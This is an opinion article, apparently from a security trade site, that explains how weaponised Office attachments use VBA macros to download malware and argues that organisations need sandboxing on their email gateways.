Hackers, attackers and cybercriminals are no slouches when it comes to staying on the cutting edge of the tools of their trade. The black hats that seek to exploit our networks, applications and users are inventive and excellent problem solvers when it comes to finding new ways to break into our systems.
The white hats that seek to defend us often lament that hackers only need to be good at the job once to be a success, whereas security pros need to be good every day. We often cite the ‘arms race’ or The Red Queen Effect when it comes to staying ahead of the creativity of the hackers. Standing still for any length of time will not serve you well in this race.
Indeed, anyone who hasn’t taken a fresh look at their email security infrastructure in the last eighteen months is likely to be behind the curve here. Given that rate of advancement of threats to our email security, relying on your last upgrade, ‘a couple of years ago’ means you’re highly likely to be out of date in terms of protection.
The best example of this, and probably the biggest threat to email security right now, is the rise of the use of VBA macros(which can potentially deploy malicious actions) to create weaponised attachments in email. Hackers and cybercriminals are great experimenters and know exactly what types of protections are used to defeat their malware.
They even download and run freely available software trials of all the on-premises email security applications to work out how to circumvent their protections. It is from this ‘reverse-engineering’ that they’ve determined how to avoid classic signature detection techniques that would look for malicious code or traces of malware embedded in attachments. And, have graduated to using the embedded macros in Office documents to do the dirty work for them.
The trap here is obvious; a weaponised attachment with a malicious macro contains no ‘viral payload’ but becomes dangerous when the malware is downloaded by macro as the end user runs the attachment. Luckily modern versions of Office applications disable macros by default, but doesn’t stop administrators re-enabling the functionality as a default, nor does it help the legions of office users who are running software that pre-dates the feature.
Using VBA macros within Office document attachments is a real demonstration of the ingenuity and dedication of cybercriminals. It shows us why we shouldn’t rely on technology that hasn’t been upgraded for a few years.
So what do we do? If classic signature-based detection is ineffective, hackers are avoiding legacy secure email gateway and desktop anti-virus protection and employees are at risk from infecting themselves with seemingly innocent looking office files, what is the solution?
Network sandboxing isn’t a new technology, it’s one that’s been used in desktop antivirus for many years; Norman AS brought the concept to the enterprise desktop a couple of decades ago and it’s been around on the network since. Recently the sandbox has also been applied to the SMTP secure email gateway, albeit with a latency overhead. It’s here that we can start to unpack the problem of hidden macro code in attachments.
Without an email attachment sandbox, weaponised attachments can pass straight through a classic secure email gateway. After all there’s no malicious code in them to trigger a signature detection. A URL alone within the macro, obfuscated within that code and unique to that attachment doesn’t in itself pose a risk. Until the macro is executed. This is where adding an SMTP gateway sandbox to your security stack helps to defend and protect against the macro threat.
Executing, exploding, detonating and other dramatic phrases are how we describe what the sandbox does. In short, it’s simply running the attachment in an environment that detects anomalies with its behaviour. For example, if a sandbox is executing an Excel spreadsheet that a user has been sent as an email attachment. And, when run the macro calls out to a remote web server to download a ZIP or executable file we can largely assume that’s not normal behaviour.
Now is the time to review the layers of protect you have in place against weaponised attachments. Adding a gateway sandbox is the latest advancement in security that you need to consider in order that you remain protected against advanced threats.
Have an opinion on security? Want to have your articles published on CSO? Please contact CSO Content Manager for our guidelines.